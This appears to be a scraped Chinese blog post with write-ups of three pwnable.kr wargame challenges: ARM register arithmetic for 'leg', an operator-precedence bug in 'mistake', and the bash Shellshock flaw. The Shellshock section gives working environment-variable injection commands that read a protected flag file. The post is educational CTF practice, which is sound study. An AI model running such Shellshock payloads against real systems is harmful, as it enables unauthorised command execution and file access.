2. 程式人生 > >pwnable.kr-leg-mistake-shellshock

pwnable.kr-leg-mistake-shellshock

阿新 發佈:2018-12-11

leg

#include <stdio.h>
#include <fcntl.h>
int key1(){
	asm("mov r3, pc\n");
}
int key2(){
	asm(
	"push	{r6}\n"
	"add	r6, pc, $1\n"
	"bx	r6\n"
	".code   16\n"
	"mov	r3, pc\n"
	"add	r3, $0x4\n"
	"push	{r3}\n"
	"pop	{pc}\n"
	".code	32\n"
	"pop	{r6}\n"
	);
}
int key3(){
	asm("mov r3, lr\n");
}
int main(){
	int key=0;
	printf("Daddy has very strong arm! : ");
	scanf("%d", &key);
	if( (key1()+key2()+key3()) == key ){
		printf("Congratz!\n");
		int fd = open("flag", O_RDONLY);
		char buf[100];
		int r = read(fd, buf, 100);
		write(0, buf, r);
	}
	else{
		printf("I have strong leg :P\n");
	}
	return 0;
}

獲取flag的條件是key1+key2+key3=key;

看來是一道考察某個基礎知識點的題目,關鍵在於asm()函式。

asm()能把()內語句寫入到彙編中執行,既然這樣,直接看彙編程式碼。

(gdb) disass key1
Dump of assembler code for function key1:
   0x00008cd4 <+0>:	push	{r11}		; (str r11, [sp, #-4]!)
   0x00008cd8 <+4>:	add	r11, sp, #0
   0x00008cdc <+8>:	mov	r3, pc
   0x00008ce0 <+12>:	mov	r0, r3
   0x00008ce4 <+16>:	sub	sp, r11, #0
   0x00008ce8 <+20>:	pop	{r11}		; (ldr r11, [sp], #4)
   0x00008cec <+24>:	bx	lr
End of assembler dump.

可以看到move r3,pc這個在key1函式中出現的語句被寫到了彙編中。

PC即暫存器R15,對於ARM指令集而言,PC總是指向當前指令的下兩條指令的地址,即PC的值為當前指令的地址值加8個位元組程式狀態暫存器。由此可知r3的值就是0x00008cdc+8,然後下一條語句出現了r0,在ARM裡r0是作為函式的返回值,所以key1=r0=r3=0x00008cdc+8.

(gdb) disass key2
Dump of assembler code for function key2:
   0x00008cf0 <+0>:	push	{r11}		; (str r11, [sp, #-4]!)
   0x00008cf4 <+4>:	add	r11, sp, #0
   0x00008cf8 <+8>:	push	{r6}		; (str r6, [sp, #-4]!)
   0x00008cfc <+12>:	add	r6, pc, #1
   0x00008d00 <+16>:	bx	r6
   0x00008d04 <+20>:	mov	r3, pc
   0x00008d06 <+22>:	adds	r3, #4
   0x00008d08 <+24>:	push	{r3}
   0x00008d0a <+26>:	pop	{pc}
   0x00008d0c <+28>:	pop	{r6}		; (ldr r6, [sp], #4)
   0x00008d10 <+32>:	mov	r0, r3
   0x00008d14 <+36>:	sub	sp, r11, #0
   0x00008d18 <+40>:	pop	{r11}		; (ldr r11, [sp], #4)
   0x00008d1c <+44>:	bx	lr
End of assembler dump.

根據上一步,看到mov r0,r3 所以key2=r0=r3=PC+4但是到這裡往上逆推的時候出現了bx

BX: 帶狀態切換的跳轉。最低位為1時,切換到Thumb指令執行,為0時,解釋為ARM指令執行。

因為R6=PC+1,所以bx跳轉到Thumb模式,這時PC=當前程式地址+4

所以key2=0x00008d04+4+4

(gdb) disass key3
Dump of assembler code for function key3:
   0x00008d20 <+0>:	push	{r11}		; (str r11, [sp, #-4]!)
   0x00008d24 <+4>:	add	r11, sp, #0
   0x00008d28 <+8>:	mov	r3, lr
   0x00008d2c <+12>:	mov	r0, r3
   0x00008d30 <+16>:	sub	sp, r11, #0
   0x00008d34 <+20>:	pop	{r11}		; (ldr r11, [sp], #4)
   0x00008d38 <+24>:	bx	lr
End of assembler dump.

還是一樣,key3=r0=r3=lr

R14稱為子程式連結暫存器LR(Link Register)有兩個特殊功能,一種是每一種模式下都可以用於儲存函式的返回地址,另外就是異常處理後的返回地址,如中斷。

這題裡的lr是作為函式的返回地址,即main函式中執行完key3函式後的下一個程式語句的地址

   0x00008d7c <+64>:	bl	0x8d20 <key3>
   0x00008d80 <+68>:	mov	r3, r0

由此可得key3=lr=0x00008d80

寫個python小程式做加法

a=0x8cdc+8
b=0x8d04+0x4+0x4
c=0x8d80
d=a+b+c;
print(d);

提交結果,得到flag

mistake

這題的題目描述裡有個hint,提示我們這題關鍵在於運算子的優先順序

#include <stdio.h>
#include <fcntl.h>

#define PW_LEN 10
#define XORKEY 1

void xor(char* s, int len){
    int i;
    for(i=0; i<len; i++){
        s[i] ^= XORKEY;
    }
}

int main(int argc, char* argv[]){
    
    int fd;
    if(fd=open("/home/mistake/password",O_RDONLY,0400) < 0){
        printf("can't open password %d\n", fd);
        return 0;
    }

    printf("do not bruteforce...\n");
    sleep(time(0)%20);

    char pw_buf[PW_LEN+1];
    int len;
    if(!(len=read(fd,pw_buf,PW_LEN) > 0)){
        printf("read error\n");
        close(fd);
        return 0;       
    }

    char pw_buf2[PW_LEN+1];
    printf("input password : ");
    scanf("%10s", pw_buf2);

    // xor your input
    xor(pw_buf2, 10);

    if(!strncmp(pw_buf, pw_buf2, PW_LEN)){
        printf("Password OK\n");
        system("/bin/cat flag\n");
    }
    else{
        printf("Wrong Password\n");
    }

    close(fd);
    return 0;
}

第一個if語句裡同時出現了=和<,這時候先執行<,然後才是執行=,因為password檔案是可以開啟的,所以open返回檔案描述符0,0<0=false,所以fd=0

因此第二個if語句中的read其實是以fd作為檔案描述符,即標準輸入,把我們鍵盤輸入的內容傳給pwn_buf

因此這個程式是讓我們在"input password"之前輸入pw_buf的值,之後再輸入pw_buf2的值,然後把pw_buf2的值按位異或0,接著再和pw_buf做比較,相等則strncmp返回0,執行system語句

所以可以輸入0000000000 1111111111,總之pw_buf和pw_buf2每一位不同即可得到flag

shellshock

這題提示說是基於真實案例。shellshock漏洞存在於4.1版本之前的bash中。

通過往環境變數中新增執行語句,可以讓bash執行任意命令

具體格式為

[email protected]:~$ env x='() { :;}; echo v' ./bash -c "echo this is a test"

這樣螢幕就會輸出

v this is a test

注意空格。

因為bash在執行之前會引入環境變數(env檢視當前環境變數),這時候環境變數內如果有可執行語句,也會一起執行。

如果直接執行

[email protected]:~$ env x='() { :;}; /bin/cat flag' ./bash -c "echo this is a test" 會返回

/bin/cat: flag: Permission denied Segmentation fault 而shellshock中既調動了bash,還讓我們有了訪問flag的許可權。

所以直接執行

[email protected]:~$ env x='() { :;}; /bin/cat flag' ./shellshock

得到flag

//為什麼會出現Segmentation fault,還有bash在讀取環境變數時為何會執行語句,以及setresuid()和setresgid()兩個函式的定義並沒有搞清楚。

相關推薦

pwnable.kr-leg-mistake-shellshock

leg #include <stdio.h> #include <fcntl.h> int key1(){ asm("mov r3, pc\n"); } int key2(){ asm( "push {r6}\n" "add r6, pc,

pwnable.krmistake

這關很有意思,題目本意是一道原始碼中運算子優先順序導致的問題,如果直接看binary的話,看反編譯程式碼就不會被運算子優先順序迷惑。 先看一下反編譯程式碼,main函式。程式判斷/home/mis

pwnable.kr-leg-witeup

bubuko 詳細分析 技術 分享 png 簡單的 img 一段 ima 做過後其實知道,是很簡單的一段代碼,也很容易看懂,看懂後計算key1、key2、key3之和即可。 main 匯編: 嗯,看來keyx的返回值是r0了,詳細分析r0值。 key1: 在

pwnable.krleg

輸入 read %d ssh http com fcn dump only pwnable從入門到放棄第八題。 Download : http://pwnable.kr/bin/leg.cDownload : http://pwnable.kr/bin/leg.asm s

pwnable.krleg

  本關主要涉及了一些arm彙編的知識。 閱讀leg.c原始碼發現,本關呼叫scanf從標準輸入讀取key後,判斷是否和key1 key2 key3 三個函式的返回值的和相等。如果相等,則輸出flag。但是ARM彙編的函式返回值和暫存器R0有關,並且key函式中涉及到了

pwnable.kr --- shellshock題解(bash破殼漏洞)

程式程式碼如下 #include <stdio.h> int main(){ setresuid(getegid(), getegid(), getegid()); setresgid(getegid(), getegid(), getegid

pwnable.kr】 flag

github down 代碼 ring lag 程序 load 沒有 mob pwnable從入門到放棄 第四題 Download : http://pwnable.kr/bin/flag 下載下來的二進制文件,對著它一臉懵逼,題目中說是逆向題,這我哪會啊。。。 用i

pwnable.kr】cmd1

strstr blog pre += 其中 函數 /tmp har cmd 最近的pwnable都是linux操作系統層面的。 ssh [email protected]/* */ -p2222 (pw:guest) 首先還是下載源代碼: #includ

pwnable.kr】cmd2

函數 environ 自動 memset 上一個 ima lin ret 保持 這道題是上一個cmd1的升級版 ssh [email protected]/* */ -p2222 (pw:mommy now I get what PATH environmen

pwnable.kr】 codemap

hunk see seed heap while malloc cati 根據 ont pwnable新的一題。 download: http://pwnable.kr/bin/codemap.exe ssh [email protected]/* */ -p

pwnable.kr bof之write up

car stdio.h ble str 不同 -1 [] 得到 imp 這一題與前兩題不同,用到了靜態調試工具ida 首先題中給出了源碼: 1 #include <stdio.h> 2 #include <string.h> 3 #

pwnable.kr lotto之write up

write char tail 技術 match ima style string sign 源代碼 : #include <stdio.h> #include <stdlib.h> #include <string.h> #

pwnable.kr cmd1之write up

變量 雙引號 inux ron argv enter nbsp cnblogs linux通配符 看一下源代碼: 1 #include <stdio.h> 2 #include <string.h> 3 4 int filter(char

pwnable.kr-echo1-Writeup

blog inux cnblogs span style symbol bin sym utf-8 pwnable的echo1,一個棧溢出的漏洞,同樣以後再補上分析過程和思路,先放exp 1 #!/usr/bin/env python 2 # -*- coding:

Pwnable.kr WP

近期,開始將以前做的CTF的題目,全部整理一遍,寫個WP,也是為了督促自己,還需要學的東西還有很多。 Pwnable.kr fd  我們首先看到這道題的C原始碼: 需要得到flag,則需要執行 system("/bin/cat flag"); 則 必須 buf =

18.9.17 pwnable.kr----collision

同樣的操作,找到c的原始碼 用(int*)強制轉換,然後賦給給ip,ip的錢五個值的和等於res 剛開始我們要輸入20個位元組(強制轉換成int型後,正好分成了五組) 執行check_password之後返回的值要等與0x21DD09EC 上指令碼(參考了大佬的)

pwnable kr 之 random

(gdb) disass main Dump of assembler code for function main: 0x00000000004005f4 <+0>: push %rbp 0x00000000004005f5 <+1>

pwnable.kr】 blackjack

看了一下游戲規則,玩家和AI一起玩牌,起初有500塊,首先下注,之後每次各自會收到一張隨機的牌(點數1-13),最先達到21點的人贏。每次拿到牌之後,你可以選擇hit(繼續拿牌)或者是stay(不拿)。如果繼續拿了牌之後超過21點,那麼你就輸了。如果你選擇stay

pwnable.kr】lotto

lotto - 2 pt [writeup] Mommy! I made a lotto program for my homework. do you want to play? ssh [email protected] -p2222 (pw:guest

pwnable.kr input解題記錄

pwnable input解題記錄 給了原始碼如下: #include "stdio.h" #include "unistd.h" #include "stdlib.h" #include "arpa/inet.h" int main(){ //stage argv char *arg